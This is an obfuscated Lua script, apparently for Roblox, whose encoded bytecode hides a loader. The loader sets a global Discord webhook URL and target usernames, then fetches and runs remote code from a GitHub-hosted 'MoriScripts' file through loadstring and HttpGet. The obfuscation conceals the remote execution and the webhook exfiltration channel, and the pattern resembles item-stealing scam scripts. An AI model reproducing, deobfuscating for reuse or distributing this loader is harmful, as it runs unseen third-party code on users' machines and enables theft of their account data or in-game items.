--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -(0 + 0))) -(v32-((879 -(282 + 595)) -1))) + (620 -(555 + 64)))) ;return v81-(v81%(932 -(857 + 74))) ;else local v82=2^(v32-(569 -(367 + 201))) ;return (((v31%(v82 + v82))>=v82) and (928 -(214 + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1637 -(1523 + 114) ;local v35;local v36;local v37;local v38;while true do if (v34==(0 + 0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (3 -(0 + 0)) );v19=v19 + (1069 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end if (v34==1) then return (v38 * (73054774 -56277558)) + (v37 * (65653 -(32 + 85))) + (v36 * 256) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v39~=3) then else local v89=0 -0 ;while true do if (v89==(0 -0)) then for v101=1 + 0 ,v24() do v41[v101-(1 -0) ]=v29();end return v43;end end end if (v39==1) then local v90=0 -0 ;local v91;while true do if (v90==(0 -0)) then v91=0;while true do if (v91~=(1 + 0)) then else v45={};v39=5 -3 ;break;end if (v91~=(0 -0)) then else v43={v40,v41,nil,v42};v44=v24();v91=1;end end break;end end end if (v39==(1057 -(87 + 968))) then local v92=0;while true do if (v92==0) then local v100=0 -0 ;while true do if (v100==0) then for v111=1 + 0 ,v44 do local v112=0;local v113;local v114;while true do if (v112~=(2 -1)) then else if (v113==1) then v114=v22()~=0 ;elseif (v113==2) then v114=v25();elseif (v113~=(1416 -(447 + 966))) then else v114=v26();end v45[v111]=v114;break;end if (v112~=0) then else local v154=0 -0 ;while true do if (v154==(1817 -(1703 + 114))) then v113=v22();v114=nil;v154=702 -(376 + 325) ;end if (v154~=(1 -0)) then else v112=2 -1 ;break;end end end end end v43[1 + 2 ]=v22();v100=1;end if (v100==1) then v92=2 -1 ;break;end end end if (v92~=1) then else for v103=1,v24() do local v104=14 -(9 + 5) ;local v105;local v106;local v107;while true do if (v104==1) then v107=nil;while true do if (v105~=(377 -(85 + 291))) then else while true do if (v106~=0) then else v107=v22();if (v21(v107,1266 -(243 + 1022) ,3 -2 )==(0 + 0)) then local v170=0;local v171;local v172;local v173;local v174;while true do if (v170==2) then while true do if ((1180 -(1123 + 57))==v171) then local v175=0 + 0 ;while true do if ((254 -(163 + 91))==v175) then v172=v21(v107,2,1933 -(1869 + 61) );v173=v21(v107,2 + 2 ,6);v175=1;end if (v175~=(3 -2)) then else v171=1 -0 ;break;end end end if ((1 + 1)==v171) then local v176=0 -0 ;while true do if (v176~=(0 + 0)) then else if (v21(v173,1,1)==1) then v174[2]=v45[v174[1476 -(1329 + 145) ]];end if (v21(v173,973 -(140 + 831) ,2)==(1851 -(1409 + 441))) then v174[3]=v45[v174[721 -(15 + 703) ]];end v176=1;end if (v176==1) then v171=2 + 1 ;break;end end end if (v171~=(441 -(262 + 176))) then else if (v21(v173,1724 -(345 + 1376) ,3)==(689 -(198 + 490))) then v174[17 -13 ]=v45[v174[4]];end v40[v103]=v174;break;end if (v171~=(2 -1)) then else local v178=0;while true do if ((1206 -(696 + 510))==v178) then v174={v23(),v23(),nil,nil};if (v172==(0 -0)) then local v185=0 -0 ;local v186;while true do if (v185~=0) then else v186=374 -(123 + 251) ;while true do if (v186~=(0 -0)) then else v174[3]=v23();v174[4]=v23();break;end end break;end end elseif (v172==(699 -(208 + 490))) then v174[3]=v24();elseif (v172==2) then v174[3]=v24() -(2^16) ;elseif (v172~=3) then else local v191=0 + 0 ;local v192;local v193;while true do if (v191==0) then v192=0;v193=nil;v191=1;end if (v191~=(1 + 0)) then else while true do if (v192~=0) then else v193=0;while true do if (v193~=0) then else v174[839 -(660 + 176) ]=v24() -((1 + 1)^(218 -(14 + 188))) ;v174[679 -(534 + 141) ]=v23();break;end end break;end end break;end end end v178=1 + 0 ;end if (v178~=(1 + 0)) then else v171=2 + 0 ;break;end end end end break;end if (v170==0) then v171=0 -0 ;v172=nil;v170=1;end if (v170==1) then v173=nil;v174=nil;v170=2;end end end break;end end break;end if (v105~=0) then else v106=0 -0 ;v107=nil;v105=1;end end break;end if (v104~=(0 -0)) then else v105=0;v106=nil;v104=1 + 0 ;end end end v39=2 + 1 ;break;end end end if (v39~=0) then else local v93=396 -(115 + 281) ;while true do if (v93==(2 -1)) then v42={};v39=1;break;end if (v93==(0 + 0)) then v40={};v41={};v93=2 -1 ;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1;local v49=(v21(v47,3 -2 ,887 -(550 + 317) ) * ((2 -0)^(44 -12))) + v46 ;local v50=v21(v47,21,86 -55 );local v51=((v21(v47,317 -(134 + 151) )==1) and  -(1666 -(970 + 695))) or (1 -0) ;if (v50==((1326 + 664) -(582 + 1408))) then if (v49==(0 -(0 -0))) then return v51 * 0 ;else v50=1 -0 ;v48=0 -0 ;end elseif (v50==(3871 -(1195 + 629))) then return ((v49==((0 -0) -0)) and (v51 * ((242 -(187 + 5 + 49))/0))) or (v51 * NaN) ;end return v8(v51,v50-(1803 -(162 + 618)) ) * (v48 + (v49/(2^(37 + 15)))) ;end v26=nil;function v26(v52)local v53=0;local v54;local v55;while true do if (v53==(1636 -(1373 + 263))) then v54=nil;if  not v52 then v52=v24();if (v52==(0 -0)) then return "";end end v53=1001 -(451 + 549) ;end if (v53==(1 + 0)) then v54=v3(v16,v19,(v19 + v52) -((1 -0) + 0) );v19=v19 + v52 ;v53=2 -0 ;end if (v53==(4 -1)) then return v6(v55);end if (v53==(1386 -((2213 -(899 + 568)) + 638))) then v55={};for v94=1, #v54 do v55[v94]=v2(v1(v3(v54,v94,v94)));end v53=1 + 2 ;end end end v18=5;end if (v18==2) then function v22()local v56=0 + 0 ;local v57;while true do if (v56==(2 -1)) then return v57;end if ((603 -(268 + 335))==v56) then v57=v1(v16,v19,v19);v19=v19 + ((863 -(426 + 146)) -(60 + 230)) ;v56=1;end end end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (1458 -(282 + 1174)) );v19=v19 + 1 + 1 ;return (v59 * (737 -481)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v83=0;while true do if (v83==0) then v20=v0(v3(v60,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v60,16));if v20 then local v108=0;local v109;while true do if (v108==1) then return v109;end if (v108==0) then v109=v5(v85,v20);v20=nil;v108=1;end end else return v85;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then v71=v79[3];else v77[v79[2]]=v63[v79[3]];end elseif (v80<=2) then v77[v79[2]]=v79[3]~=0 ;elseif (v80>3) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v71=v79[3];end elseif (v80<=7) then if (v80<=5) then local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==2) then for v157=v120,v72 do v123=v123 + 1 ;v77[v157]=v121[v123];end break;end if (v119==1) then v72=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==0) then v120=v79[2];v121,v122=v70(v77[v120](v13(v77,v120 + 1 ,v79[3])));v119=1;end end elseif (v80==6) then local v132=0;local v133;local v134;while true do if (v132==1) then v77[v133 + 1 ]=v134;v77[v133]=v134[v79[4]];break;end if (v132==0) then v133=v79[2];v134=v77[v79[3]];v132=1;end end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=8) then v77[v79[2]]=v79[3]~=0 ;elseif (v80>9) then local v137=v79[2];v77[v137]=v77[v137](v13(v77,v137 + 1 ,v72));else v77[v79[2]]();end elseif (v80<=15) then if (v80<=12) then if (v80==11) then v77[v79[2]]=v63[v79[3]];else local v127=v79[2];v77[v127]=v77[v127](v13(v77,v127 + 1 ,v72));end elseif (v80<=13) then do return;end elseif (v80==14) then v77[v79[2]]=v79[3];else local v141=v79[2];local v142=v77[v79[3]];v77[v141 + 1 ]=v142;v77[v141]=v142[v79[4]];end elseif (v80<=18) then if (v80<=16) then v77[v79[2]]=v79[3];elseif (v80==17) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=19) then v77[v79[2]]();elseif (v80==20) then do return;end else local v148=0;local v149;local v150;local v151;local v152;while true do if (v148==0) then v149=v79[2];v150,v151=v70(v77[v149](v13(v77,v149 + 1 ,v79[3])));v148=1;end if (v148==2) then for v167=v149,v72 do v152=v152 + 1 ;v77[v167]=v150[v152];end break;end if (v148==1) then v72=(v151 + v149) -1 ;v152=0;v148=2;end end end v71=v71 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31373433313935343637383O32392O322F65334C3453357334685A6163444549756465345145655F646F306F4E6842696C4B4730486B694C4B6546667A6A444973583738327034414377384E62676831576A354D75030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030B3O00706172616F6E61733O3603093O00557365724E616D653200173O00120E3O00013O0026113O000E000100020004013O000E000100122O000100033O00300700010004000500122O000100063O00122O000200073O00200F00020002000800120E000400094O0008000500014O0015000200054O000C00013O00022O00130001000100010004013O001600010026113O0001000100010004013O0001000100122O000100033O0030070001000A000B00122O000100033O0030070001000C000B00120E3O00023O0004013O000100012O000D3O00017O00",v9(),...);end
